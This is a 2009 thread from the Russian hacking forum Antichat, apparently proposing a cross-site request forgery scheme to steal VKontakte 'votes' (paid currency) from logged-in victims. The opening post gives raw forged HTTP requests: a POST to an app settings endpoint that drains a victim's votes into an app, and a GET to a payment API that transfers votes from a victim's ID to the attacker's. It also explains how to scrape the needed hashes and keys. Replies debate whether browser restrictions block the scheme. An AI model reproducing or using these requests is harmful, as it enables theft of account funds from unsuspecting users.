Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Тырим голоса вконтакта? О_о (https://forum.antichat.xyz/showthread.php?t=138225)

Ponchik 30.08.2009 00:49
Тырим голоса вконтакта? О_о
 
Навеяно вот этой темой
https://forum.antichat.ru/threadnav138188-1-10.html
Тама ajax получает у вконтакта ID и запрашивает всю остальную инфу
Так вот например приложение передачи голосов
http://vkontakte.ru/app577176
Чтоб положить в него голоса, вот такой пакет нужен
приложение ненадо устанавливать на страницу или разрешать действия, не 1к голосов слил через него, проверено
Код:
POST http://vkontakte.ru/apps.php?act=a_settings HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: vkontakte.ru
Referer: http://vkontakte.ru/app577176
Cookie: куки
Proxy-Connection: Keep-Alive
Content-Length: 84
Content-Transfer-Encoding: binary

app_id=577176&app_hash=hash&cn=0&caf=0&caph=0&caa=0&add=99999999&withdraw=0
Верхняя часть пакета вместе с куками автоматически получается, т.к. жертва залогинена на вконтакте (vir2total получает имено так инфу)

Потом сам контент
app_id - ID приложения, всё понятно
app_hash - хэш (если пасмареть HTML код паги, его можно увидеть)
Код:
...
var app_invited_text = 'Приглашения Вашим друзьям в это приложение успешно высланы.';
var app_invited1_text = 'Приглашение успешно выслано.';
var app_hash = 'hash';
var invite_used = 0;
....
Я так понимаю через ajax можно "выпилить" этот хэш
И add это кол-во голосов, указываем 99999 и он пополняет приложение на все голоса что есть на акке
=========
Для передачи голосов такой пакет
Код:
GET http://misc.roboxchange.com/External/VKontakte/API.ashx?APImethod=transferVotes&authKey=ключ&fromId=ID жертвы&Id=ваш id HTTP/1.0
Host: misc.roboxchange.com
Referer: http://cs252.vkontakte.ru/u9352882/961f3908269ce8.zip
Proxy-Connection: Keep-Alive
authKey - ключ, он также есть в HTML
so.addVariable("auth_key", "ключ");
=========
Собстна вооот... Надеюсь все меня поняли? И ИМХО эта система будет работать, просто я в ajax'e не рублю а очень спать хочется, отпишитесь кто попробовал, катит, не катит

шаман говорит что там инфа через флэшку выводится а не через ajax :rolleyes: в общем я хз, ну я своё ИМХО выложил, теперь пру спать

wildshaman 30.08.2009 15:23
Какбэ кроссдоменные запросы JS не поддержиает -> страницу не отпарсить и хеш с аускеем не получить.

mailbrush 30.08.2009 15:38
Профиксили, чтоли?
Отправил
Код:
GET http://misc.roboxchange.com/External/VKontakte/API.ashx?APImethod=transferVotes&authKey=d77*****ab819438b2c3********91f&fromId=9352882&Id=34595285 HTTP/1.0
Host: misc.roboxchange.com
Referer: http://cs252.vkontakte.ru/u9352882/961f3908269ce8.zip
Proxy-Connection: Keep-Alive
инеткреком, получил "Жулик!!!!".

Ponchik 30.08.2009 16:43
МБ неверный authKey =\
Я вот попробовал, всё норм
А вот какраз указал неверный authKey говорит жулек :D

zavra 30.08.2009 20:23
и как ты получишь хэш со страницы? для каждого id он разный, и вытянуть его через флеш нельзя, ибо стоит allowscriptaccess = false.
нет, никак. только если разгадать алгоритм генерации этого самого хэша.

mailbrush 30.08.2009 20:24
Блин, а я свой хэш указывал =\

Ponchik 30.08.2009 21:16
zavra, ну через ajax, ведь vir2total так и получал данные ИМХО, но ещё раз говорю шаман сказал это было приложение в фрейме, но сайт в ддосе такчто я незнаю

zavra 30.08.2009 21:34
приложение во фрейме = флешка? если да, то знаю как это сделано, но это ололо какой жестокий приват =)


Время: 17:11